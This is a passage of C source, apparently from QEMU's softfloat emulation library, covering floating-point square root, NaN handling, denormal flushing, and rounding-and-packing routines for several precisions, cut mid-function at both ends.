* at the top, so these positions are one less. */ bit = DECOMPOSED_BINARY_POINT - 1; last_bit = MAX(p->frac_shift - 4, 0); do { uint64_t q = 1ULL << bit; uint64_t t_frac = s_frac + q; if (t_frac <= a_frac) { s_frac = t_frac + q; a_frac -= t_frac; r_frac += q; } a_frac <<= 1; } while (--bit >= last_bit); /* Undo the right shift done above. If there is any remaining * fraction, the result is inexact. Set the sticky bit. */ a.frac = (r_frac << 1) + (a_frac != 0); return a; } float16 QEMU_FLATTEN float16_sqrt(float16 a, float_status *status) { FloatParts pa = float16_unpack_canonical(a, status); FloatParts pr = sqrt_float(pa, status, &float16_params); return float16_round_pack_canonical(pr, status); } static float32 QEMU_SOFTFLOAT_ATTR soft_f32_sqrt(float32 a, float_status *status) { FloatParts pa = float32_unpack_canonical(a, status); FloatParts pr = sqrt_float(pa, status, &float32_params); return float32_round_pack_canonical(pr, status); } static float64 QEMU_SOFTFLOAT_ATTR soft_f64_sqrt(float64 a, float_status *status) { FloatParts pa = float64_unpack_canonical(a, status); FloatParts pr = sqrt_float(pa, status, &float64_params); return float64_round_pack_canonical(pr, status); } float32 QEMU_FLATTEN float32_sqrt(float32 xa, float_status *s) { union_float32 ua, ur; ua.s = xa; if (unlikely(!can_use_fpu(s))) { goto soft; } float32_input_flush1(&ua.s, s); if (QEMU_HARDFLOAT_1F32_USE_FP) { if (unlikely(!(fpclassify(ua.h) == FP_NORMAL || fpclassify(ua.h) == FP_ZERO) || signbit(ua.h))) { goto soft; } } else if (unlikely(!float32_is_zero_or_normal(ua.s) || float32_is_neg(ua.s))) { goto soft; } ur.h = sqrtf(ua.h); return ur.s; soft: return soft_f32_sqrt(ua.s, s); } float64 QEMU_FLATTEN float64_sqrt(float64 xa, float_status *s) { union_float64 ua, ur; ua.s = xa; if (unlikely(!can_use_fpu(s))) { goto soft; } float64_input_flush1(&ua.s, s); if (QEMU_HARDFLOAT_1F64_USE_FP) { if (unlikely(!(fpclassify(ua.h) == FP_NORMAL || fpclassify(ua.h) == FP_ZERO) || signbit(ua.h))) { goto soft; } } else if (unlikely(!float64_is_zero_or_normal(ua.s) || float64_is_neg(ua.s))) { goto soft; } ur.h = sqrt(ua.h); return ur.s; soft: return soft_f64_sqrt(ua.s, s); } /*---------------------------------------------------------------------------- | The pattern for a default generated NaN. *----------------------------------------------------------------------------*/ float16 float16_default_nan(float_status *status) { FloatParts p = parts_default_nan(status); p.frac >>= float16_params.frac_shift; return float16_pack_raw(p); } float32 float32_default_nan(float_status *status) { FloatParts p = parts_default_nan(status); p.frac >>= float32_params.frac_shift; return float32_pack_raw(p); } float64 float64_default_nan(float_status *status) { FloatParts p = parts_default_nan(status); p.frac >>= float64_params.frac_shift; return float64_pack_raw(p); } float128 float128_default_nan(float_status *status) { FloatParts p = parts_default_nan(status); float128 r; /* Extrapolate from the choices made by parts_default_nan to fill * in the quad-floating format. If the low bit is set, assume we * want to set all non-snan bits. */ #ifdef _MSC_VER r.low = 0ULL - (p.frac & 1); #else r.low = -(p.frac & 1); #endif r.high = p.frac >> (DECOMPOSED_BINARY_POINT - 48); r.high |= UINT64_C(0x7FFF000000000000); r.high |= (uint64_t)p.sign << 63; return r; } /*---------------------------------------------------------------------------- | Returns a quiet NaN from a signalling NaN for the floating point value `a'. *----------------------------------------------------------------------------*/ float16 float16_silence_nan(float16 a, float_status *status) { FloatParts p = float16_unpack_raw(a); p.frac <<= float16_params.frac_shift; p = parts_silence_nan(p, status); p.frac >>= float16_params.frac_shift; return float16_pack_raw(p); } float32 float32_silence_nan(float32 a, float_status *status) { FloatParts p = float32_unpack_raw(a); p.frac <<= float32_params.frac_shift; p = parts_silence_nan(p, status); p.frac >>= float32_params.frac_shift; return float32_pack_raw(p); } float64 float64_silence_nan(float64 a, float_status *status) { FloatParts p = float64_unpack_raw(a); p.frac <<= float64_params.frac_shift; p = parts_silence_nan(p, status); p.frac >>= float64_params.frac_shift; return float64_pack_raw(p); } /*---------------------------------------------------------------------------- | If `a' is denormal and we are in flush-to-zero mode then set the | input-denormal exception and return zero. Otherwise just return the value. *----------------------------------------------------------------------------*/ static bool parts_squash_denormal(FloatParts p, float_status *status) { if (p.exp == 0 && p.frac != 0) { float_raise(float_flag_input_denormal, status); return true; } return false; } float16 float16_squash_input_denormal(float16 a, float_status *status) { if (status->flush_inputs_to_zero) { FloatParts p = float16_unpack_raw(a); if (parts_squash_denormal(p, status)) { return float16_set_sign(float16_zero, p.sign); } } return a; } float32 float32_squash_input_denormal(float32 a, float_status *status) { if (status->flush_inputs_to_zero) { FloatParts p = float32_unpack_raw(a); if (parts_squash_denormal(p, status)) { return float32_set_sign(float32_zero, p.sign); } } return a; } float64 float64_squash_input_denormal(float64 a, float_status *status) { if (status->flush_inputs_to_zero) { FloatParts p = float64_unpack_raw(a); if (parts_squash_denormal(p, status)) { return float64_set_sign(float64_zero, p.sign); } } return a; } /*---------------------------------------------------------------------------- | Takes a 64-bit fixed-point value `absZ' with binary point between bits 6 | and 7, and returns the properly rounded 32-bit integer corresponding to the | input. If `zSign' is 1, the input is negated before being converted to an | integer. Bit 63 of `absZ' must be zero. Ordinarily, the fixed-point input | is simply rounded to an integer, with the inexact exception raised if the | input cannot be represented exactly as an integer. However, if the fixed- | point input is too large, the invalid exception is raised and the largest | positive or negative integer is returned. *----------------------------------------------------------------------------*/ static int32_t roundAndPackInt32(flag zSign, uint64_t absZ, float_status *status) { int8_t roundingMode; flag roundNearestEven; int8_t roundIncrement, roundBits; int32_t z; roundingMode = status->float_rounding_mode; roundNearestEven = ( roundingMode == float_round_nearest_even ); switch (roundingMode) { case float_round_nearest_even: case float_round_ties_away: roundIncrement = 0x40; break; case float_round_to_zero: roundIncrement = 0; break; case float_round_up: roundIncrement = zSign ? 0 : 0x7f; break; case float_round_down: roundIncrement = zSign ? 0x7f : 0; break; case float_round_to_odd: roundIncrement = absZ & 0x80 ? 0 : 0x7f; break; default: abort(); } roundBits = absZ & 0x7F; absZ = ( absZ + roundIncrement )>>7; absZ &= ~ ( ( ( roundBits ^ 0x40 ) == 0 ) & roundNearestEven ); z = absZ; if ( zSign ) z = - z; if ( ( absZ>>32 ) || ( z && ( ( z < 0 ) ^ zSign ) ) ) { float_raise(float_flag_invalid, status); return zSign ? INT32_MIN : INT32_MAX; } if (roundBits) { status->float_exception_flags |= float_flag_inexact; } return z; } /*---------------------------------------------------------------------------- | Takes the 128-bit fixed-point value formed by concatenating `absZ0' and | `absZ1', with binary point between bits 63 and 64 (between the input words), | and returns the properly rounded 64-bit integer corresponding to the input. | If `zSign' is 1, the input is negated before being converted to an integer. | Ordinarily, the fixed-point input is simply rounded to an integer, with | the inexact exception raised if the input cannot be represented exactly as | an integer. However, if the fixed-point input is too large, the invalid | exception is raised and the largest positive or negative integer is | returned. *----------------------------------------------------------------------------*/ static int64_t roundAndPackInt64(flag zSign, uint64_t absZ0, uint64_t absZ1, float_status *status) { int8_t roundingMode; flag roundNearestEven, increment; int64_t z; roundingMode = status->float_rounding_mode; roundNearestEven = ( roundingMode == float_round_nearest_even ); switch (roundingMode) { case float_round_nearest_even: case float_round_ties_away: increment = ((int64_t) absZ1 < 0); break; case float_round_to_zero: increment = 0; break; case float_round_up: increment = !zSign && absZ1; break; case float_round_down: increment = zSign && absZ1; break; case float_round_to_odd: increment = !(absZ0 & 1) && absZ1; break; default: abort(); } if ( increment ) { ++absZ0; if ( absZ0 == 0 ) goto overflow; absZ0 &= ~ ( ( (uint64_t) ( absZ1<<1 ) == 0 ) & roundNearestEven ); } z = absZ0; if ( zSign ) z = - z; if ( z && ( ( z < 0 ) ^ zSign ) ) { overflow: float_raise(float_flag_invalid, status); return zSign ? INT64_MIN : INT64_MAX; } if (absZ1) { status->float_exception_flags |= float_flag_inexact; } return z; } /*---------------------------------------------------------------------------- | Takes the 128-bit fixed-point value formed by concatenating `absZ0' and | `absZ1', with binary point between bits 63 and 64 (between the input words), | and returns the properly rounded 64-bit unsigned integer corresponding to the | input. Ordinarily, the fixed-point input is simply rounded to an integer, | with the inexact exception raised if the input cannot be represented exactly | as an integer. However, if the fixed-point input is too large, the invalid | exception is raised and the largest unsigned integer is returned. *----------------------------------------------------------------------------*/ static int64_t roundAndPackUint64(flag zSign, uint64_t absZ0, uint64_t absZ1, float_status *status) { int8_t roundingMode; flag roundNearestEven, increment; roundingMode = status->float_rounding_mode; roundNearestEven = (roundingMode == float_round_nearest_even); switch (roundingMode) { case float_round_nearest_even: case float_round_ties_away: increment = ((int64_t)absZ1 < 0); break; case float_round_to_zero: increment = 0; break; case float_round_up: increment = !zSign && absZ1; break; case float_round_down: increment = zSign && absZ1; break; case float_round_to_odd: increment = !(absZ0 & 1) && absZ1; break; default: abort(); } if (increment) { ++absZ0; if (absZ0 == 0) { float_raise(float_flag_invalid, status); return UINT64_MAX; } absZ0 &= ~(((uint64_t)(absZ1<<1) == 0) & roundNearestEven); } if (zSign && absZ0) { float_raise(float_flag_invalid, status); return 0; } if (absZ1) { status->float_exception_flags |= float_flag_inexact; } return absZ0; } /*---------------------------------------------------------------------------- | Normalizes the subnormal single-precision floating-point value represented | by the denormalized significand `aSig'. The normalized exponent and | significand are stored at the locations pointed to by `zExpPtr' and | `zSigPtr', respectively. *----------------------------------------------------------------------------*/ static void normalizeFloat32Subnormal(uint32_t aSig, int *zExpPtr, uint32_t *zSigPtr) { int8_t shiftCount; shiftCount = clz32(aSig) - 8; *zSigPtr = aSig<<shiftCount; *zExpPtr = 1 - shiftCount; } /*---------------------------------------------------------------------------- | Takes an abstract floating-point value having sign `zSign', exponent `zExp', | and significand `zSig', and returns the proper single-precision floating- | point value corresponding to the abstract input. Ordinarily, the abstract | value is simply rounded and packed into the single-precision format, with | the inexact exception raised if the abstract input cannot be represented | exactly. However, if the abstract value is too large, the overflow and | inexact exceptions are raised and an infinity or maximal finite value is | returned. If the abstract value is too small, the input value is rounded to | a subnormal number, and the underflow and inexact exceptions are raised if | the abstract input cannot be represented exactly as a subnormal single- | precision floating-point number. | The input significand `zSig' has its binary point between bits 30 | and 29, which is 7 bits to the left of the usual location. This shifted | significand must be normalized or smaller. If `zSig' is not normalized, | `zExp' must be 0; in that case, the result returned is a subnormal number, | and it must not require rounding. In the usual case that `zSig' is | normalized, `zExp' must be 1 less than the ``true'' floating-point exponent. | The handling of underflow and overflow follows the IEC/IEEE Standard for | Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ static float32 roundAndPackFloat32(flag zSign, int zExp, uint32_t zSig, float_status *status) { int8_t roundingMode; flag roundNearestEven; int8_t roundIncrement, roundBits; flag isTiny; roundingMode = status->float_rounding_mode; roundNearestEven = ( roundingMode == float_round_nearest_even ); switch (roundingMode) { case float_round_nearest_even: case float_round_ties_away: roundIncrement = 0x40; break; case float_round_to_zero: roundIncrement = 0; break; case float_round_up: roundIncrement = zSign ? 0 : 0x7f; break; case float_round_down: roundIncrement = zSign ? 0x7f : 0; break; case float_round_to_odd: roundIncrement = zSig & 0x80 ? 0 : 0x7f; break; default: abort(); break; } roundBits = zSig & 0x7F; if ( 0xFD <= (uint16_t) zExp ) { if ( ( 0xFD < zExp ) || ( ( zExp == 0xFD ) && ( (int32_t) ( zSig + roundIncrement ) < 0 ) ) ) { bool overflow_to_inf = roundingMode != float_round_to_odd && roundIncrement != 0; float_raise(float_flag_overflow | float_flag_inexact, status); return packFloat32(zSign, 0xFF, -!overflow_to_inf); } if ( zExp < 0 ) { if (status->flush_to_zero) { float_raise(float_flag_output_denormal, status); return packFloat32(zSign, 0, 0); } isTiny = (status->float_detect_tininess == float_tininess_before_rounding) || ( zExp < -1 ) || ( zSig + roundIncrement < 0x80000000 ); shift32RightJamming( zSig, - zExp, &zSig ); zExp = 0; roundBits = zSig & 0x7F; if (isTiny && roundBits) { float_raise(float_flag_underflow, status); } if (roundingMode == float_round_to_odd) { /* * For round-to-odd case, the roundIncrement depends on * zSig which just changed. */ roundIncrement = zSig & 0x80 ? 0 : 0x7f; } } } if (roundBits) { status->float_exception_flags |= float_flag_inexact; } zSig = ( zSig + roundIncrement )>>7; zSig &= ~ ( ( ( roundBits ^ 0x40 ) == 0 ) & roundNearestEven ); if ( zSig == 0 ) zExp = 0; return packFloat32( zSign, zExp, zSig ); } /*---------------------------------------------------------------------------- | Takes an abstract floating-point value having sign `zSign', exponent `zExp', | and significand `zSig', and returns the proper single-precision floating- | point value corresponding to the abstract input. This routine is just like | `roundAndPackFloat32' except that `zSig' does not have to be normalized. | Bit 31 of `zSig' must be zero, and `zExp' must be 1 less than the ``true'' | floating-point exponent. *----------------------------------------------------------------------------*/ static float32 normalizeRoundAndPackFloat32(flag zSign, int zExp, uint32_t zSig, float_status *status) { int8_t shiftCount; shiftCount = clz32(zSig) - 1; return roundAndPackFloat32(zSign, zExp - shiftCount, zSig<<shiftCount, status); } /*---------------------------------------------------------------------------- | Normalizes the subnormal double-precision floating-point value represented | by the denormalized significand `aSig'. The normalized exponent and | significand are stored at the locations pointed to by `zExpPtr' and | `zSigPtr', respectively. *----------------------------------------------------------------------------*/ static void normalizeFloat64Subnormal(uint64_t aSig, int *zExpPtr, uint64_t *zSigPtr) { int8_t shiftCount; shiftCount = clz64(aSig) - 11; *zSigPtr = aSig<<shiftCount; *zExpPtr = 1 - shiftCount; } /*---------------------------------------------------------------------------- | Packs the sign `zSign', exponent `zExp', and significand `zSig' into a | double-precision floating-point value, returning the result. After being | shifted into the proper positions, the three fields are simply added | together to form the result. This means that any integer portion of `zSig' | will be added into the exponent. Since a properly normalized significand | will have an integer portion equal to 1, the `zExp' input should be 1 less | than the desired result exponent whenever `zSig' is a complete, normalized | significand. *----------------------------------------------------------------------------*/ static inline float64 packFloat64(flag zSign, int zExp, uint64_t zSig) { return make_float64( ( ( (uint64_t) zSign )<<63 ) + ( ( (uint64_t) zExp )<<52 ) + zSig); } /*---------------------------------------------------------------------------- | Takes an abstract floating-point value having sign `zSign', exponent `zExp', | and significand `zSig', and returns the proper double-precision floating- | point value corresponding to the abstract input. Ordinarily, the abstract | value is simply rounded and packed into the double-precision format, with | the inexact exception raised if the abstract input cannot be represented | exactly. However, if the abstract value is too large, the overflow and | inexact exceptions are raised and an infinity or maximal finite value is | returned. If the abstract value is too small, the input value is rounded to | a subnormal number, and the underflow and inexact exceptions are raised if | the abstract input cannot be represented exactly as a subnormal double- | precision floating-point number. | The input significand `zSig' has its binary point between bits 62 | and 61, which is 10 bits to the left of the usual location. This shifted | significand must be normalized or smaller. If `zSig' is not normalized, | `zExp' must be 0; in that case, the result returned is a subnormal number, | and it must not require rounding. In the usual case that `zSig' is | normalized, `zExp' must be 1 less than the ``true'' floating-point exponent. | The handling of underflow and overflow follows the IEC/IEEE Standard for | Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ static float64 roundAndPackFloat64(flag zSign, int zExp, uint64_t zSig, float_status *status) { int8_t roundingMode; flag roundNearestEven; int roundIncrement, roundBits; flag isTiny; roundingMode = status->float_rounding_mode; roundNearestEven = ( roundingMode == float_round_nearest_even ); switch (roundingMode) { case float_round_nearest_even: case float_round_ties_away: roundIncrement = 0x200; break; case float_round_to_zero: roundIncrement = 0; break; case float_round_up: roundIncrement = zSign ? 0 : 0x3ff; break; case float_round_down: roundIncrement = zSign ? 0x3ff : 0; break; case float_round_to_odd: roundIncrement = (zSig & 0x400) ? 0 : 0x3ff; break; default: abort(); } roundBits = zSig & 0x3FF; if ( 0x7FD <= (uint16_t) zExp ) { if ( ( 0x7FD < zExp ) || ( ( zExp == 0x7FD ) && ( (int64_t) ( zSig + roundIncrement ) < 0 ) ) ) { bool overflow_to_inf = roundingMode != float_round_to_odd && roundIncrement != 0; float_raise(float_flag_overflow | float_flag_inexact, status); return packFloat64(zSign, 0x7FF, -(!overflow_to_inf)); } if ( zExp < 0 ) { if (status->flush_to_zero) { float_raise(float_flag_output_denormal, status); return packFloat64(zSign, 0, 0); } isTiny = (status->float_detect_tininess == float_tininess_before_rounding) || ( zExp < -1 ) || ( zSig + roundIncrement < UINT64_C(0x8000000000000000) ); shift64RightJamming( zSig, - zExp, &zSig ); zExp = 0; roundBits = zSig & 0x3FF; if (isTiny && roundBits) { float_raise(float_flag_underflow, status); } if (roundingMode == float_round_to_odd) { /* * For round-to-odd case, the roundIncrement depends on * zSig which just changed. */ roundIncrement = (zSig & 0x400) ? 0 : 0x3ff; } } } if (roundBits) { status->float_exception_flags |= float_flag_inexact; } zSig = ( zSig + roundIncrement )>>10; zSig &= ~ ( ( ( roundBits ^ 0x200 ) == 0 ) & roundNearestEven ); if ( zSig == 0 ) zExp = 0; return packFloat64( zSign, zExp, zSig ); } /*---------------------------------------------------------------------------- | Takes an abstract floating-point value having sign `zSign', exponent `zExp', | and significand `zSig', and returns the proper double-precision floating- | point value corresponding to the abstract input. This routine is just like | `roundAndPackFloat64' except that `zSig' does not have to be normalized. | Bit 63 of `zSig' must be zero, and `zExp' must be 1 less than the ``true'' | floating-point exponent. *----------------------------------------------------------------------------*/ static float64 normalizeRoundAndPackFloat64(flag zSign, int zExp, uint64_t zSig, float_status *status) { int8_t shiftCount; shiftCount = clz64(zSig) - 1; return roundAndPackFloat64(zSign, zExp - shiftCount, zSig<<shiftCount, status); } /*---------------------------------------------------------------------------- | Normalizes the subnormal extended double-precision floating-point value | represented by the denormalized significand `aSig'. The normalized exponent | and significand are stored at the locations pointed to by `zExpPtr' and | `zSigPtr', respectively. *----------------------------------------------------------------------------*/ void normalizeFloatx80Subnormal(uint64_t aSig, int32_t *zExpPtr, uint64_t *zSigPtr) { int8_t shiftCount; shiftCount = clz64(aSig); *zSigPtr = aSig<<shiftCount; *zExpPtr = 1 - shiftCount; } /*---------------------------------------------------------------------------- | Takes an abstract floating-point value having sign `zSign', exponent `zExp', | and extended significand formed by the concatenation of `zSig0' and `zSig1', | and returns the proper extended double-precision floating-point value | corresponding to the abstract input. Ordinarily, the abstract value is | rounded and packed into the extended double-precision format, with the | inexact exception raised if the abstract input cannot be represented | exactly. However, if the abstract value is too large, the overflow and | inexact exceptions are raised and an infinity or maximal finite value is | returned. If the abstract value is too small, the input value is rounded to | a subnormal number, and the underflow and inexact exceptions are raised if | the abstract input cannot be represented exactly as a subnormal extended | double-precision floating-point number. | If `roundingPrecision' is 32 or 64, the result is rounded to the same | number of bits as single or double precision, respectively. Otherwise, the | result is rounded to the full precision of the extended double-precision | format. | The input significand must be normalized or smaller. If the input | significand is not normalized, `zExp' must be 0; in that case, the result | returned is a subnormal number, and it must not require rounding. The | handling of underflow and overflow follows the IEC/IEEE Standard for Binary | Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ floatx80 roundAndPackFloatx80(int8_t roundingPrecision, flag zSign, int32_t zExp, uint64_t zSig0, uint64_t zSig1, float_status *status) { int8_t roundingMode; flag roundNearestEven, increment, isTiny; int64_t roundIncrement, roundMask, roundBits; roundingMode = status->float_rounding_mode; roundNearestEven = ( roundingMode == float_round_nearest_even ); if ( roundingPrecision == 80 ) goto precision80; if ( roundingPrecision == 64 ) { roundIncrement = UINT64_C(0x0000000000000400); roundMask = UINT64_C(0x00000000000007FF); } else if ( roundingPrecision == 32 ) { roundIncrement = UINT64_C(0x0000008000000000); roundMask = UINT64_C(0x000000FFFFFFFFFF); } else { goto precision80; } zSig0 |= ( zSig1 != 0 ); switch (roundingMode) { case float_round_nearest_even: case float_round_ties_away: break; case float_round_to_zero: roundIncrement = 0; break; case float_round_up: roundIncrement = zSign ? 0 : roundMask; break; case float_round_down: roundIncrement = zSign ? roundMask : 0; break; default: abort(); } roundBits = zSig0 & roundMask; if ( 0x7FFD <= (uint32_t) ( zExp - 1 ) ) { if ( ( 0x7FFE < zExp ) || ( ( zExp == 0x7FFE ) && ( zSig0 + roundIncrement < zSig0 ) ) ) { goto overflow; } if ( zExp <= 0 ) { if (status->flush_to_zero) { float_raise(float_flag_output_denormal, status); return packFloatx80(zSign, 0, 0); } isTiny = (status->float_detect_tininess == float_tininess_before_rounding) || ( zExp < 0 ) || ( zSig0 <= zSig0 + roundIncrement ); shift64RightJamming( zSig0, 1 - zExp, &zSig0 ); zExp = 0; roundBits = zSig0 & roundMask; if (isTiny && roundBits) { float_raise(float_flag_underflow, status); } if (roundBits) { status->float_exception_flags |= float_flag_inexact; } zSig0 += roundIncrement; if ( (int64_t) zSig0 < 0 ) zExp = 1; roundIncrement = roundMask + 1; if ( roundNearestEven && ( roundBits<<1 == roundIncrement ) ) { roundMask |= roundIncrement; } zSig0 &= ~ roundMask; return packFloatx80( zSign, zExp, zSig0 ); } } if (roundBits) { status->float_exception_flags |= float_flag_inexact; } zSig0 += roundIncrement; if ( zSig0 < roundIncrement ) { ++zExp; zSig0 = UINT64_C(0x8000000000000000); } roundIncrement = roundMask + 1; if ( roundNearestEven && ( roundBits<<1 == roundIncrement ) ) { roundMask |= roundIncrement; } zSig0 &= ~ roundMask; if ( zSig0 == 0 ) zExp = 0; return packFloatx80( zSign, zExp, zSig0 ); precision80: switch (roundingMode) { case float_round_nearest_even: case float_round_ties_away: increment = ((int64_t)zSig1 < 0); break; case float_round_to_zero: increment = 0; break; case float_round_up: increment = !zSign && zSig1; break; case float_round_down: increment = zSign && zSig1; break; default: abort(); } if ( 0x7FFD <= (uint32_t) ( zExp - 1 ) ) { if ( ( 0x7FFE < zExp ) || ( ( zExp == 0x7FFE ) && ( zSig0 == UINT64_C(0xFFFFFFFFFFFFFFFF) ) && increment ) ) { roundMask = 0; overflow: float_raise(float_flag_overflow | float_flag_inexact, status); if ( ( roundingMode == float_round_to_zero ) || ( zSign && ( roundingMode == float_round_up ) ) || ( ! zSign && ( roundingMode == float_round_down ) ) ) { return packFloatx80( zSign, 0x7FFE, ~ roundMask ); } return packFloatx80(zSign, floatx80_infinity_high, floatx80_infinity_low); } if ( zExp <= 0 ) { isTiny = (status->float_detect_tininess == float_tininess_before_rounding) || ( zExp < 0 ) || ! increment || ( zSig0 < UINT64_C(0xFFFFFFFFFFFFFFFF) ); shift64ExtraRightJamming( zSig0, zSig1, 1 - zExp, &zSig0, &zSig1 ); zExp = 0; if (isTiny && zSig1) { float_raise(float_flag_underflow, status); } if (zSig1) { status->float_exception_flags |= float_flag_inexact; } switch (roundingMode) { case float_round_nearest_even: case float_round_ties_away: increment = ((int64_t)zSig1 < 0); break; case float_round_to_zero: increment = 0; break; case float_round_up: increment = !zSign && zSig1; break; case float_round_down: increment = zSign && zSig1; break; default: abort(); } if ( increment ) { ++zSig0; zSig0 &= ~ ( ( (uint64_t) ( zSig1<<1 ) == 0 ) & roundNearestEven ); if ( (int64_t) zSig0 < 0 ) zExp = 1; } return packFloatx80( zSign, zExp, zSig0 ); } } if (zSig1) { status->float_exception_flags |= float_flag_inexact; } if ( increment ) { ++zSig0; if ( zSig0 == 0 ) { ++zExp; zSig0 = UINT64_C(0x8000000000000000); } else { zSig0 &= ~ ( ( (uint64_t) ( zSig1<<1 ) == 0 ) & roundNearestEven ); } } else { if ( zSig0 == 0 ) zExp = 0; } return packFloatx80( zSign, zExp, zSig0 ); } /*---------------------------------------------------------------------------- | Takes an abstract floating-point value having sign `zSign', exponent | `zExp', and significand formed by the concatenation of `zSig0' and `zSig1', | and returns the proper extended double-precision floating-point value | corresponding to the abstract input. This routine is just like | `roundAndPackFloatx80' except that the input significand does not have to be | normalized. *----------------------------------------------------------------------------*/ floatx80 normalizeRoundAndPackFloatx80(int8_t roundingPrecision, flag zSign, int32_t zExp, uint64_t zSig0, uint64_t zSig1, float_status *status) { int8_t shiftCount; if ( zSig0 == 0 ) { zSig0 = zSig1; zSig1 = 0; zExp -= 64; } shiftCount = clz64(zSig0); shortShift128Left( zSig0, zSig1, shiftCount, &zSig0, &zSig1 ); zExp -= shiftCount; return roundAndPackFloatx80(roundingPrecision, zSign, zExp, zSig0, zSig1, status); } /*---------------------------------------------------------------------------- | Returns the least-significant 64 fraction bits of the quadruple-precision | floating-point value `a'. *----------------------------------------------------------------------------*/ static inline uint64_t extractFloat128Frac1( float128 a ) { return a.low; } /*---------------------------------------------------------------------------- | Returns the most-significant 48 fraction bits of the quadruple-precision | floating-point value `a'. *----------------------------------------------------------------------------*/ static inline uint64_t extractFloat128Frac0( float128 a ) { return a.high & UINT64_C(0x0000FFFFFFFFFFFF); } /*---------------------------------------------------------------------------- | Returns the exponent bits of the quadruple-precision floating-point value | `a'. *----------------------------------------------------------------------------*/ static inline int32_t extractFloat128Exp( float128 a ) { return ( a.high>>48 ) & 0x7FFF; } /*---------------------------------------------------------------------------- | Returns the sign bit of the quadruple-precision floating-point value `a'. *----------------------------------------------------------------------------*/ static inline flag extractFloat128Sign( float128 a ) { return a.high>>63; } /*---------------------------------------------------------------------------- | Normalizes the subnormal quadruple-precision floating-point value | represented by the denormalized significand formed by the concatenation of | `aSig0' and `aSig1'. The normalized exponent is stored at the location | pointed to by `zExpPtr'. The most significant 49 bits of the normalized | significand are stored at the location pointed to by `zSig0Ptr', and the | least significant 64 bits of the normalized significand are stored at the | location pointed to by `zSig1Ptr'. *----------------------------------------------------------------------------*/ static void normalizeFloat128Subnormal( uint64_t aSig0, uint64_t aSig1, int32_t *zExpPtr, uint64_t *zSig0Ptr, uint64_t *zSig1Ptr ) { int8_t shiftCount; if ( aSig0 == 0 ) { shiftCount = clz64(aSig1) - 15; if ( shiftCount < 0 ) { *zSig0Ptr = aSig1>>( - shiftCount ); *zSig1Ptr = aSig1<<( shiftCount & 63 ); } else { *zSig0Ptr = aSig1<<shiftCount; *zSig1Ptr = 0; } *zExpPtr = - shiftCount - 63; } else { shiftCount = clz64(aSig0) - 15; shortShift128Left( aSig0, aSig1, shiftCount, zSig0Ptr, zSig1Ptr ); *zExpPtr = 1 - shiftCount; } } /*---------------------------------------------------------------------------- | Packs the sign `zSign', the exponent `zExp', and the significand formed | by the concatenation of `zSig0' and `zSig1' into a quadruple-precision | floating-point value, returning the result. After being shifted into the | proper positions, the three fields `zSign', `zExp', and `zSig0' are simply | added together to form the most significant 32 bits of the result. This | means that any integer portion of `zSig0' will be added into the exponent. | Since a properly normalized significand will have an integer portion equal | to 1, the `zExp' input should be 1 less than the desired result exponent | whenever `zSig0' and `zSig1' concatenated form a complete, normalized | significand. *----------------------------------------------------------------------------*/ static inline float128 packFloat128( flag zSign, int32_t zExp, uint64_t zSig0, uint64_t zSig1 ) { float128 z; z.low = zSig1; z.high = ( ( (uint64_t) zSign )<<63 ) + ( ( (uint64_t) zExp )<<48 ) + zSig0; return z; } /*---------------------------------------------------------------------------- | Takes an abstract floating-point value having sign `zSign', exponent `zExp', | and extended significand formed by the concatenation of `zSig0', `zSig1', | and `zSig2', and returns the proper quadruple-precision floating-point value | corresponding to the abstract input. Ordinarily, the abstract value is | simply rounded and packed into the quadruple-precision format, with the | inexact exception raised if the abstract input cannot be represented | exactly. However, if the abstract value is too large, the overflow and | inexact exceptions are raised and an infinity or maximal finite value is | returned. If the abstract value is too small, the input value is rounded to | a subnormal number, and the underflow and inexact exceptions are raised if | the abstract input cannot be represented exactly as a subnormal quadruple- | precision floating-point number. | The input significand must be normalized or smaller. If the input | significand is not normalized, `zExp' must be 0; in that case, the result | returned is a subnormal number, and it must not require rounding. In the | usual case that the input significand is normalized, `zExp' must be 1 less | than the ``true'' floating-point exponent. The handling of underflow and | overflow follows the IEC/IEEE Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ static float128 roundAndPackFloat128(flag zSign, int32_t zExp, uint64_t zSig0, uint64_t zSig1, uint64_t zSig2, float_status *status) { int8_t roundingMode; flag roundNearestEven, increment, isTiny; roundingMode = status->float_rounding_mode; roundNearestEven = ( roundingMode == float_round_nearest_even ); switch (roundingMode) { case float_round_nearest_even: case float_round_ties_away: increment = ((int64_t)zSig2 < 0); break; case float_round_to_zero: increment = 0; break; case float_round_up: increment = !zSign && zSig2; break; case float_round_down: increment = zSign && zSig2; break; case float_round_to_odd: increment = !(zSig1 & 0x1) && zSig2; break; default: abort(); } if ( 0x7FFD <= (uint32_t) zExp ) { if ( ( 0x7FFD < zExp ) || ( ( zExp == 0x7FFD ) && eq128( UINT64_C(0x0001FFFFFFFFFFFF), UINT64_C(0xFFFFFFFFFFFFFFFF), zSig0, zSig1 ) && increment ) ) { float_raise(float_flag_overflow | float_flag_inexact, status); if ( ( roundingMode == float_round_to_zero ) || ( zSign && ( roundingMode == float_round_up ) ) || ( ! zSign && ( roundingMode == float_round_down ) ) || (roundingMode == float_round_to_odd) ) { return packFloat128( zSign, 0x7FFE, UINT64_C(0x0000FFFFFFFFFFFF), UINT64_C(0xFFFFFFFFFFFFFFFF) ); } return packFloat128( zSign, 0x7FFF, 0, 0 ); } if ( zExp < 0 ) { if (status->flush_to_zero) { float_raise(float_flag_output_denormal, status); return packFloat128(zSign, 0, 0, 0); } isTiny = (status->float_detect_tininess == float_tininess_before_rounding) || ( zExp < -1 ) || ! increment || lt128( zSig0, zSig1, UINT64_C(0x0001FFFFFFFFFFFF), UINT64_C(0xFFFFFFFFFFFFFFFF) ); shift128ExtraRightJamming( zSig0, zSig1, zSig2, - zExp, &zSig0, &zSig1, &zSig2 ); zExp = 0; if (isTiny && zSig2) { float_raise(float_flag_underflow, status); } switch (roundingMode) { case float_round_nearest_even: case float_round_ties_away: increment = ((int64_t)zSig2 < 0); break; case float_round_to_zero: increment = 0; break; case float_round_up: increment = !zSign && zSig2; break; case float_round_down: increment = zSign && zSig2; break; case float_round_to_odd: increment = !(zSig1 & 0x1) && zSig2; break; default: abort(); } } } if (zSig2) { status->float_exception_flags |= float_flag_inexact; } if ( increment ) { add128( zSig0, zSig1, 0, 1, &zSig0, &zSig1 ); zSig1 &= ~ ( ( zSig2 + zSig2 == 0 ) & roundNearestEven ); } else { if ( ( 